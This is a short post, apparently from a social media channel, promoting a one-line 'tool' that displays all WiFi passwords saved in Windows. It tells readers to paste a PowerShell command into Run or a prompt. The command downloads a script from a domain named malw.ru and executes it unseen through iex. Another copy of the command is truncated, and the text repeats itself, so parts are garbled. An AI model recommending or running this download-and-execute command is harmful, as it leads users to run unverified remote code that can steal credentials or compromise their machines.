Simple tool to view all passwords of WiFi networks saved in Windows
To use, just enter the command in Windows Search/Run/Command Prompt/PowerShell/New Shortcut
powershell -command "iwr -useb https://raw.githubuserconten
Command with shorter url:
powershell -command "iwr -useb https://malw.ru/dl/wifipasswords | iex"
After it finishes getting passwords, it will open Notepad with table of SSIDs and passwords
(if empty, then turn on Wi-Fi)
To use, just enter the command in Windows Search/Run/Command Prompt/PowerShell/New Shortcut
powershell -command "iwr -useb https://raw.githubuserconten
Command with shorter url:
powershell -command "iwr -useb https://malw.ru/dl/wifipasswords | iex"
After it finishes getting passwords, it will open Notepad with table of SSIDs and passwords
(if empty, then turn on Wi-Fi)
⚠️ For more information about this tool, visit the GitHub link.
🧑🏻💻 @TERMUXCOMMANDD